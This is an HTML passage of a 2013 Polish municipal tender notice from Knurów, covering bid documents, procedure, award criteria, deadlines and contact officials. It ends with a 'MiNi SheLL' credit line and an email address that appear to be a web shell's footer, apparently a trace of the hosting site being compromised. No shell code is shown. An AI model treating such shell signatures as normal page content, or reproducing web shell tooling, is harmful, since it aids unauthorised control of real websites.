<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca polegający na wiedzy i doświadczeniu  lub osobach zdolnych do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust. 2b pzp przedstawia w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę istotnych postanowień umów zawartych w wyniku niniejszego postępowania w stosunku do treści ofert, na podstawie których dokonano wyboru wykonawców dla poszczególnych rejonów w przypadkach wskazanych we wzorach umów stanowiących załączniki do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok.218, w godz. 8:00-13:30 lub za zalicz. pocztowym po uiszczeniu opłaty w wys. 37,00 zł na konto zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2013 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 218, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby wyznaczone do porozumienia się z wykonawcami: a) Naczelnik Wydziału Zamówień Publicznych-Grażyna Szweda, tel. 32 339-23-08, b) Z-ca Naczelnika Wydziału Zamówień Publicznych - Kornelia Loch, tel. 32 339-23-10, fax 32 441-97-44, 32 339-22-92, e-mail zp.@knurow.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com